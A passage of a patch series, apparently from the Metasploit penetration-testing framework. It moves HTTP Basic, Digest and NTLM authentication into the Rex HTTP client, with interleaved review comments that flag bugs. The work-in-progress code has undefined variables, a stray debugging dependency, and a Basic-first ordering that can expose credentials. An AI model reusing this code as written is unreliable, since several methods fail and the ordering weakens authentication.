datastore['AUTH_URI'] || "/" begin if requesttype == "PUT" - res,c = send_digest_request_cgi({ + res= send_digest_request_cgi({ 'uri' => path, 'method' => requesttype, 'data' => 'Test123\r\n', @@ -271,7 +270,7 @@ def do_http_auth_digest(user,pass,requesttype) 'DigestAuthPassword' => pass }, 25) elsif requesttype == "PROPFIND" - res,c = send_digest_request_cgi({ + res = send_digest_request_cgi({ 'uri' => path, 'method' => requesttype, 'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>', @@ -281,7 +280,7 @@ def do_http_auth_digest(user,pass,requesttype) 'headers' => { 'Depth' => '0'} }, 25) else - res,c = send_digest_request_cgi({ + res= send_digest_request_cgi({ 'uri' => path, 'method' => requesttype, #'DigestAuthIIS' => false, 
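Review bot: `require 'msf/core/exploit/http/auth'` is added here, but this patch's diffstat lists four files and none of them is lib/msf/core/exploit/http/auth.rb; that file is only created by the next patch in the series. Applied on its own, this commit would fail at load time on the require, and on `include Exploit::Remote::HttpAuth` in client.rb and web/http.rb, which breaks bisecting. Squash the two patches or move the new file into this one.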
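Review bot: do_http_auth_ntlm now calls `resp.code` directly on the result of send_request_auth_negotiate, which, as written in the previous patch, returns nil when the reply is not an HTTP response and on `::Errno::EPIPE` or `::Timeout::Error`. Add `return :abort if resp.nil?` before `return :abort if (resp.code == 404)`. The same guard is worth adding at the `res = send_digest_request_cgi(...)` call sites changed in do_http_auth_digest if that helper can return nil; its new definition is not part of this patch. The rescue clause of the enclosing `begin` lies outside the hunk, so a handler there may already cover this, but an explicit guard is clearer.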
@@ -300,7 +299,7 @@ def do_http_auth_digest(user,pass,requesttype) if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) if ((res.code == 201) and (requesttype == "PUT")) print_good("Trying to delete #{path}") - del_res,c = send_digest_request_cgi({ + del_res = send_digest_request_cgi({ 'uri' => path, 'method' => 'DELETE', 'DigestAuthUser' => user, From c407fa9e74cb224eb1fd3390807084bcb6671b52 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Wed, 30 Jan 2013 16:37:32 -0600 Subject: [PATCH 231/421] add mixjn --- lib/msf/core/exploit/http/auth.rb | 279 ++++++++++++++++++++++++++++++ 1 file changed, 279 insertions(+) create mode 100644 lib/msf/core/exploit/http/auth.rb diff --git a/lib/msf/core/exploit/http/auth.rb b/lib/msf/core/exploit/http/auth.rb new file mode 100644 index 000000000000..aa707eddde25 --- /dev/null +++ b/lib/msf/core/exploit/http/auth.rb 
@@ -0,0 +1,279 @@ + + +module Msf + +### +# +# This module provides methods for exploiting an HTTP client by acting +# as an HTTP server. +# +### +module Exploit::Remote::HttpAuth + + + # + # Combine the user/pass into an auth string for the HTTP Client + # + def basic_auth + return if not datastore['BasicAuthUser'] + datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') + end + # + # Handles both generic Negotiate and NTLM providers + # This does not send back the client, instead it expects that you will + # handshake for each request sent. While this does create additional + # overhead on the wire, it makes dealing with the requests much easier + # from a code point of view. + # + # Options: + # - method: HTTP method, default: GET + # - headers: HTTP headers as a hash + # - provider: HTTP authentication provider, default: 'NTLM ' + # - username: The username to authenticate as + # - password: The password to authenticate with + # + def send_request_auth_negotiate(opts ={}, timeout =20) + ntlm_options = { + :signing => false, + :usentlm2_session => datastore['NTLM::UseNTLM2_session'], + :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], + :send_lm => datastore['NTLM::SendLM'], + :send_ntlm => datastore['NTLM::SendNTLM'] + } + + if opts['provider'] and opts['provider'].include? 'Negotiate' + provider = "Negotiate " + else + provider = 'NTLM ' + end + + opts['method']||= 'GET' + opts['headers']||= {} + + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = datastore['DOMAIN'] + + b64_blob = Rex::Text::encode_base64( + NTLM_UTILS::make_ntlmssp_blob_init( + domain_name, + workstation_name, + ntlmssp_flags + )) + + ntlm_message_1 = provider + b64_blob + to = opts['timeout'] || timeout + + begin + c = connect(opts) + + # First request to get the challenge + opts['headers']['Authorization'] = ntlm_message_1 + r = c.request_cgi(opts) + resp = c.send_recv(r, to) + unless resp.kind_of? 
Rex::Proto::Http::Response + return nil + end + + return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] + + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] + return resp unless ntlm_challenge + + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + default_name = blob_data[:default_name] || '' #netbios name + default_domain = blob_data[:default_domain] || '' #netbios domain + dns_host_name = blob_data[:dns_host_name] || '' #dns name + dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time + + spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + + resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( + opts['username'], + opts['password'], + challenge_key, + domain_name, + default_name, + default_domain, + dns_host_name, + dns_domain_name, + chall_MsvAvTimestamp, + spnopt, + ntlm_options + ) + + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( + domain_name, + workstation_name, + opts['username'], + resp_lm, + resp_ntlm, + '', + ntlmssp_flags + ) + + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + + # Send the response + opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" + r = c.request_cgi(opts) + resp = c.send_recv(r, to, true) + unless resp.kind_of? 
Rex::Proto::Http::Response + return nil + end + c.close + return resp + + rescue ::Errno::EPIPE, ::Timeout::Error + return nil + end + end + + def send_digest_request_cgi(opts={}, timeout=20) + @nonce_count = 0 + + return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) + to = opts['timeout'] || timeout + + digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" + digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" + + method = opts['method'] + path = opts['uri'] + iis = true + if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) + iis = false + end + + begin + @nonce_count += 1 + + resp = opts['response'] + + if not resp + # Get authentication-challenge from server, and read out parameters required + c = connect(opts) + r = c.request_cgi(opts.merge({ + 'uri' => path, + 'method' => method })) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + + if resp.code != 401 + return resp + end + return resp unless resp.headers['WWW-Authenticate'] + end + + # Don't anchor this regex to the beginning of string because header + # folding makes it appear later when the server presents multiple + # WWW-Authentication options (such as is the case with IIS configured + # for Digest or NTLM). 
+ resp['www-authenticate'] =~ /Digest (.*)/ + + parameters = {} + $1.split(/,[[:space:]]*/).each do |p| + k, v = p.split("=", 2) + parameters[k] = v.gsub('"', '') + end + + qop = parameters['qop'] + + if parameters['algorithm'] =~ /(.*?)(-sess)?$/ + algorithm = case $1 + when 'MD5' then Digest::MD5 + when 'SHA1' then Digest::SHA1 + when 'SHA2' then Digest::SHA2 + when 'SHA256' then Digest::SHA256 + when 'SHA384' then Digest::SHA384 + when 'SHA512' then Digest::SHA512 + when 'RMD160' then Digest::RMD160 + else raise Error, "unknown algorithm \"#{$1}\"" + end + algstr = parameters["algorithm"] + sess = $2 + else + algorithm = Digest::MD5 + algstr = "MD5" + sess = false + end + + a1 = if sess then + [ + algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), + parameters['nonce'], + @cnonce + ].join ':' + else + "#{digest_user}:#{parameters['realm']}:#{digest_password}" + end + + ha1 = algorithm.hexdigest(a1) + ha2 = algorithm.hexdigest("#{method}:#{path}") + + request_digest = [ha1, parameters['nonce']] + request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop + request_digest << ha2 + request_digest = request_digest.join ':' + + # Same order as IE7 + auth = [ + "Digest username=\"#{digest_user}\"", + "realm=\"#{parameters['realm']}\"", + "nonce=\"#{parameters['nonce']}\"", + "uri=\"#{path}\"", + "cnonce=\"#{@cnonce}\"", + "nc=#{'%08x' % @nonce_count}", + "algorithm=#{algstr}", + "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", + # The spec says the qop value shouldn't be enclosed in quotes, but + # some versions of IIS require it and Apache accepts it. Chrome + # and Firefox both send it without quotes but IE does it this way. + # Use the non-compliant-but-everybody-does-it to be as compatible + # as possible by default. The user can override if they don't like + # it. + if qop.nil? then + elsif iis then + "qop=\"#{qop}\"" + else + "qop=#{qop}" + end, + if parameters.key? 
'opaque' then + "opaque=\"#{parameters['opaque']}\"" + end + ].compact + + headers ={ 'Authorization' => auth.join(', ') } + headers.merge!(opts['headers']) if opts['headers'] + + + # Send main request with authentication + r = c.request_cgi(opts.merge({ + 'uri' => path, + 'method' => method, + 'headers' => headers })) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + + c.close + return resp + + rescue ::Errno::EPIPE, ::Timeout::Error + end + end + + + +end +end + From ef1fc58e5e1158391944c6dea9f16377c7468baf Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Thu, 31 Jan 2013 13:34:32 -0600 Subject: [PATCH 232/421] Remove mixin, start moving into Rex move auth awareness into rex itself --- lib/msf/core/auxiliary/web/http.rb | 1 - lib/msf/core/exploit/http/auth.rb | 279 --------------------------- lib/rex/proto/http/client.rb | 296 ++++++++++++++++++++++++++++- 3 files changed, 293 insertions(+), 283 deletions(-) delete mode 100644 lib/msf/core/exploit/http/auth.rb diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index ffb0385d36f0..0f88517176cb 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -10,7 +10,6 @@ module Msf class Auxiliary::Web::HTTP - include Exploit::Remote::HttpAuth class Request attr_accessor :url diff --git a/lib/msf/core/exploit/http/auth.rb b/lib/msf/core/exploit/http/auth.rb deleted file mode 100644 index aa707eddde25..000000000000 --- a/lib/msf/core/exploit/http/auth.rb +++ /dev/null 
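Review bot: `send_digest_request_cgi` returns `[nil,nil]` when no Digest user is configured but a single response (or nil) on every other path. The `http_login` callers changed in this series now assign the result to one variable, so that early exit hands them a truthy two-element Array instead of nil; `return nil` would match the other paths. In both new methods `c.close` runs only on the final success path, so each early `return nil`/`return resp` and the rescued `Errno::EPIPE`/`Timeout::Error` leave the client from `connect(opts)` open; an `ensure` that closes `c` when it was assigned would cover every exit. `@cnonce` is interpolated into the Digest response and header but never assigned in this file, so unless the including class sets it the client nonce is an empty string. The module header comment ("exploiting an HTTP client by acting as an HTTP server") does not describe these client-side authentication helpers and should be reworded.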
@@ -1,279 +0,0 @@ - - -module Msf - -### -# -# This module provides methods for exploiting an HTTP client by acting -# as an HTTP server. -# -### -module Exploit::Remote::HttpAuth - - - # - # Combine the user/pass into an auth string for the HTTP Client - # - def basic_auth - return if not datastore['BasicAuthUser'] - datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') - end - # - # Handles both generic Negotiate and NTLM providers - # This does not send back the client, instead it expects that you will - # handshake for each request sent. While this does create additional - # overhead on the wire, it makes dealing with the requests much easier - # from a code point of view. - # - # Options: - # - method: HTTP method, default: GET - # - headers: HTTP headers as a hash - # - provider: HTTP authentication provider, default: 'NTLM ' - # - username: The username to authenticate as - # - password: The password to authenticate with - # - def send_request_auth_negotiate(opts ={}, timeout =20) - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - - if opts['provider'] and opts['provider'].include? 'Negotiate' - provider = "Negotiate " - else - provider = 'NTLM ' - end - - opts['method']||= 'GET' - opts['headers']||= {} - - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - - b64_blob = Rex::Text::encode_base64( - NTLM_UTILS::make_ntlmssp_blob_init( - domain_name, - workstation_name, - ntlmssp_flags - )) - - ntlm_message_1 = provider + b64_blob - to = opts['timeout'] || timeout - - begin - c = connect(opts) - - # First request to get the challenge - opts['headers']['Authorization'] = ntlm_message_1 - r = c.request_cgi(opts) - resp = c.send_recv(r, to) - unless resp.kind_of? 
Rex::Proto::Http::Response - return nil - end - - return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] - return resp unless ntlm_challenge - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - default_name = blob_data[:default_name] || '' #netbios name - default_domain = blob_data[:default_domain] || '' #netbios domain - dns_host_name = blob_data[:dns_host_name] || '' #dns name - dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time - - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - - resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( - opts['username'], - opts['password'], - challenge_key, - domain_name, - default_name, - default_domain, - dns_host_name, - dns_domain_name, - chall_MsvAvTimestamp, - spnopt, - ntlm_options - ) - - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( - domain_name, - workstation_name, - opts['username'], - resp_lm, - resp_ntlm, - '', - ntlmssp_flags - ) - - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" - r = c.request_cgi(opts) - resp = c.send_recv(r, to, true) - unless resp.kind_of? 
Rex::Proto::Http::Response - return nil - end - c.close - return resp - - rescue ::Errno::EPIPE, ::Timeout::Error - return nil - end - end - - def send_digest_request_cgi(opts={}, timeout=20) - @nonce_count = 0 - - return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) - to = opts['timeout'] || timeout - - digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" - digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" - - method = opts['method'] - path = opts['uri'] - iis = true - if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) - iis = false - end - - begin - @nonce_count += 1 - - resp = opts['response'] - - if not resp - # Get authentication-challenge from server, and read out parameters required - c = connect(opts) - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - - if resp.code != 401 - return resp - end - return resp unless resp.headers['WWW-Authenticate'] - end - - # Don't anchor this regex to the beginning of string because header - # folding makes it appear later when the server presents multiple - # WWW-Authentication options (such as is the case with IIS configured - # for Digest or NTLM). 
- resp['www-authenticate'] =~ /Digest (.*)/ - - parameters = {} - $1.split(/,[[:space:]]*/).each do |p| - k, v = p.split("=", 2) - parameters[k] = v.gsub('"', '') - end - - qop = parameters['qop'] - - if parameters['algorithm'] =~ /(.*?)(-sess)?$/ - algorithm = case $1 - when 'MD5' then Digest::MD5 - when 'SHA1' then Digest::SHA1 - when 'SHA2' then Digest::SHA2 - when 'SHA256' then Digest::SHA256 - when 'SHA384' then Digest::SHA384 - when 'SHA512' then Digest::SHA512 - when 'RMD160' then Digest::RMD160 - else raise Error, "unknown algorithm \"#{$1}\"" - end - algstr = parameters["algorithm"] - sess = $2 - else - algorithm = Digest::MD5 - algstr = "MD5" - sess = false - end - - a1 = if sess then - [ - algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), - parameters['nonce'], - @cnonce - ].join ':' - else - "#{digest_user}:#{parameters['realm']}:#{digest_password}" - end - - ha1 = algorithm.hexdigest(a1) - ha2 = algorithm.hexdigest("#{method}:#{path}") - - request_digest = [ha1, parameters['nonce']] - request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop - request_digest << ha2 - request_digest = request_digest.join ':' - - # Same order as IE7 - auth = [ - "Digest username=\"#{digest_user}\"", - "realm=\"#{parameters['realm']}\"", - "nonce=\"#{parameters['nonce']}\"", - "uri=\"#{path}\"", - "cnonce=\"#{@cnonce}\"", - "nc=#{'%08x' % @nonce_count}", - "algorithm=#{algstr}", - "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", - # The spec says the qop value shouldn't be enclosed in quotes, but - # some versions of IIS require it and Apache accepts it. Chrome - # and Firefox both send it without quotes but IE does it this way. - # Use the non-compliant-but-everybody-does-it to be as compatible - # as possible by default. The user can override if they don't like - # it. - if qop.nil? then - elsif iis then - "qop=\"#{qop}\"" - else - "qop=#{qop}" - end, - if parameters.key? 
'opaque' then - "opaque=\"#{parameters['opaque']}\"" - end - ].compact - - headers ={ 'Authorization' => auth.join(', ') } - headers.merge!(opts['headers']) if opts['headers'] - - - # Send main request with authentication - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method, - 'headers' => headers })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - - c.close - return resp - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - - -end -end - diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 0572ea02ffe4..ddc1d3b30e22 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -2,6 +2,7 @@ require 'rex/socket' require 'rex/proto/http' require 'rex/text' +require 'pry' module Rex module Proto @@ -21,13 +22,15 @@ class Client # # Creates a new client instance # - def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil) + def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil, username = '', password = '') self.hostname = host self.port = port.to_i self.context = context self.ssl = ssl self.ssl_version = ssl_version self.proxies = proxies + self.username = username + self.password = password self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, @@ -61,7 +64,17 @@ def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, prox 'uri_fake_end' => false, # bool 'uri_fake_params_start' => false, # bool 'header_folding' => false, # bool - 'chunked_size' => 0 # integer + 'chunked_size' => 0, # integer + # + # NTLM Options + # + 'usentlm2_session' => true, + 'use_ntlmv2' => true, + 'send_lm' => true, + 'send_ntlm' => true, + 'SendSPN' => true, + 'UseLMKey' => false, + 'domain' => 'WORKSTATION' } # This is not used right now... 
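Review bot: `require 'pry'` at the top of lib/rex/proto/http/client.rb makes a debugging gem a hard load-time dependency of the HTTP client, so every consumer of this file fails with LoadError on an install that does not ship pry. Nothing in the hunks of this commit shown here calls into pry, so it looks like a leftover from a debugging session. Drop the line before merge.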
@@ -298,7 +311,7 @@ def request_cgi(opts={}) req << set_raw_headers(c_rawh) req << set_body(pstr) - req + {:string => req , :opts => opts} end # @@ -347,7 +360,16 @@ def close # to reuse an existing connection. # def send_recv(req, t = -1, persist=false) + res = _send_recv(req,t,persist) + if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? + send_auth(res, opts, t, persist) + end + end + + def _send_recv(req, t = -1, persist=false) @pipeline = persist + opts = req[:opts] + req = req[:string] send_request(req, t) res = read_response(t) res.request = req.to_s if res 
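Review bot: The new `send_recv` passes `opts` to `send_auth`, but `opts` is neither a parameter nor a local of `send_recv` (it is only assigned inside `_send_recv`), so unless the class defines an `opts` method elsewhere the 401 branch raises NameError instead of authenticating. The method's value is also that of the `if` expression, which is nil whenever the reply is not a 401 with credentials, so ordinary responses are no longer returned to the caller. Suggested: `res = send_auth(res, req[:opts], t, persist)` inside the `if`, and a bare `res` as the last line. In the preceding hunk `request_cgi` now returns `{:string => req , :opts => opts}` rather than the request itself, so any caller that uses the return value directly as a request needs updating; those call sites are outside these hunks.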
@@ -362,6 +384,271 @@ def send_request(req, t = -1) conn.put(req.to_s) end + def have_creds? + !(self.username.nil?) && self.username != '' + end + + def send_auth(res, opts, t, persist) + supported_auths = res.headers['WWW-Authenticate'] + if supported_auths.include? 'Basic' + opts['basic_auth'] = self.username.to_s + ':' + self.password.to_s + req = request_cgi(opts) + res = _send_recv(req,t,persist) + return res + elsif supported_auths.include? "Digest" + opts['DigestAuthUser'] = self.username.to_s + opts['DigestAuthPassword'] = self.password.to_s + temp_response = digest_auth(opts) + if temp_response.kind_of? Rex::Proto::Http::Response + res = temp_response + end + return res + elsif supported_auths.include? "NTLM" + opts['provider'] = 'NTLM' + temp_response = negotiate_auth(opts) + if temp_response.kind_of? Rex::Proto::Http::Response + res = temp_response + end + return res + elsif supported_auths.include? "Negotiate" + opts['provider'] = 'Negotiate' + temp_response = negotiate_auth(opts) + if temp_response.kind_of? Rex::Proto::Http::Response + res = temp_response + end + return res + end + end + + def digest_auth(opts={}) + @nonce_count = 0 + + digest_user = opts['DigestAuthUser'] || "" + digest_password = opts['DigestAuthPassword'] || "" + + method = opts['method'] + path = opts['uri'] + iis = true + if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) + iis = false + end + + begin + @nonce_count += 1 + + resp = opts['response'] + + if not resp + # Get authentication-challenge from server, and read out parameters required + r = request_cgi(opts.merge({ + 'uri' => path, + 'method' => method })) + resp = _send_recv(r, to) + unless resp.kind_of? 
Rex::Proto::Http::Response + return nil + end + + if resp.code != 401 + return resp + end + return resp unless resp.headers['WWW-Authenticate'] + end + + # Don't anchor this regex to the beginning of string because header + # folding makes it appear later when the server presents multiple + # WWW-Authentication options (such as is the case with IIS configured + # for Digest or NTLM). + resp['www-authenticate'] =~ /Digest (.*)/ + + parameters = {} + $1.split(/,[[:space:]]*/).each do |p| + k, v = p.split("=", 2) + parameters[k] = v.gsub('"', '') + end + + qop = parameters['qop'] + + if parameters['algorithm'] =~ /(.*?)(-sess)?$/ + algorithm = case $1 + when 'MD5' then Digest::MD5 + when 'SHA1' then Digest::SHA1 + when 'SHA2' then Digest::SHA2 + when 'SHA256' then Digest::SHA256 + when 'SHA384' then Digest::SHA384 + when 'SHA512' then Digest::SHA512 + when 'RMD160' then Digest::RMD160 + else raise Error, "unknown algorithm \"#{$1}\"" + end + algstr = parameters["algorithm"] + sess = $2 + else + algorithm = Digest::MD5 + algstr = "MD5" + sess = false + end + + a1 = if sess then + [ + algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), + parameters['nonce'], + @cnonce + ].join ':' + else + "#{digest_user}:#{parameters['realm']}:#{digest_password}" + end + + ha1 = algorithm.hexdigest(a1) + ha2 = algorithm.hexdigest("#{method}:#{path}") + + request_digest = [ha1, parameters['nonce']] + request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop + request_digest << ha2 + request_digest = request_digest.join ':' + + # Same order as IE7 + auth = [ + "Digest username=\"#{digest_user}\"", + "realm=\"#{parameters['realm']}\"", + "nonce=\"#{parameters['nonce']}\"", + "uri=\"#{path}\"", + "cnonce=\"#{@cnonce}\"", + "nc=#{'%08x' % @nonce_count}", + "algorithm=#{algstr}", + "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", + # The spec says the qop value shouldn't be enclosed in quotes, but + # some versions of IIS require it and 
Apache accepts it. Chrome + # and Firefox both send it without quotes but IE does it this way. + # Use the non-compliant-but-everybody-does-it to be as compatible + # as possible by default. The user can override if they don't like + # it. + if qop.nil? then + elsif iis then + "qop=\"#{qop}\"" + else + "qop=#{qop}" + end, + if parameters.key? 'opaque' then + "opaque=\"#{parameters['opaque']}\"" + end + ].compact + + headers ={ 'Authorization' => auth.join(', ') } + headers.merge!(opts['headers']) if opts['headers'] + + # Send main request with authentication + r = request_cgi(opts.merge({ + 'uri' => path, + 'method' => method, + 'headers' => headers })) + resp = _send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + + return resp + + rescue ::Errno::EPIPE, ::Timeout::Error + end + end + + def negotiate_auth(opts={}) + ntlm_options = { + :signing => false, + :usentlm2_session => self.config['usentlm2_session'], + :use_ntlmv2 => self.config['use_ntlmv2'], + :send_lm => self.config['send_lm'], + :send_ntlm => self.config['send_ntlm'] + } + + if opts['provider'] and opts['provider'].include? 'Negotiate' + provider = "Negotiate " + else + provider = 'NTLM ' + end + + opts['method']||= 'GET' + opts['headers']||= {} + + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = self.config['domain'] + + b64_blob = Rex::Text::encode_base64( + NTLM_UTILS::make_ntlmssp_blob_init( + domain_name, + workstation_name, + ntlmssp_flags + )) + + ntlm_message_1 = provider + b64_blob + + begin + # First request to get the challenge + opts['headers']['Authorization'] = ntlm_message_1 + r = request_cgi(opts) + resp = _send_recv(r, to) + unless resp.kind_of? 
Rex::Proto::Http::Response + return nil + end + + return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] + + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] + return resp unless ntlm_challenge + + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + default_name = blob_data[:default_name] || '' #netbios name + default_domain = blob_data[:default_domain] || '' #netbios domain + dns_host_name = blob_data[:dns_host_name] || '' #dns name + dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time + + spnopt = {:use_spn => self.config['SendSPN'], :name => self.hostname} + + resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( + opts['username'], + opts['password'], + challenge_key, + domain_name, + default_name, + default_domain, + dns_host_name, + dns_domain_name, + chall_MsvAvTimestamp, + spnopt, + ntlm_options + ) + + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( + domain_name, + workstation_name, + opts['username'], + resp_lm, + resp_ntlm, + '', + ntlmssp_flags + ) + + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + + # Send the response + opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" + r = request_cgi(opts) + resp = _send_recv(r, to, true) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + return resp + + rescue ::Errno::EPIPE, ::Timeout::Error + return nil + end + end # # Read a response from the server # 
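Review bot: `send_auth` tests for Basic first, so when a server's `WWW-Authenticate` offers Basic together with Digest, NTLM or Negotiate the client answers with the reversibly encoded username and password rather than a challenge-response; on a connection without TLS that exposes the credentials to anyone on the path. Checking the branches strongest-first (Negotiate/NTLM, then Digest, then Basic) keeps the same coverage without the downgrade. `digest_auth` and `negotiate_auth` both call `_send_recv(r, to)` although no `to` is assigned in either method. `negotiate_auth` also reads `opts['username']`/`opts['password']`, which `send_auth` never sets (it fills in only `opts['provider']` for those branches), so unless the caller already put them in `opts` these paths fail or run without the configured credentials. `digest_auth` still references `datastore`, which this class does not define in the code shown.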
@@ -839,6 +1126,9 @@ def set_formatted_header(var, val) # attr_accessor :proxies + # Auth + attr_accessor :username, :password + # When parsing the request, thunk off the first response from the server, since junk attr_accessor :junk_pipeline From efe09472860d6edcd66d730af664817dab88fff2 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Thu, 31 Jan 2013 14:01:24 -0600 Subject: [PATCH 233/421] Start fixing datastore options --- lib/msf/core/exploit/http/client.rb | 23 +++++++++++++++-------- lib/rex/proto/http/client.rb | 8 ++++++-- 2 files changed, 21 insertions(+), 10 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index b5df69ba248c..8e8e05dadb4a 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -16,7 +16,6 @@ module Msf module Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Exploit::Remote::NTLM::Client - include Exploit::Remote::HttpAuth # # Constants @@ -38,7 +37,9 @@ def initialize(info = {}) Opt::RHOST, Opt::RPORT(80), OptString.new('VHOST', [ false, "HTTP server virtual host" ]), - Opt::Proxies + Opt::Proxies, + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication']), ], self.class ) 
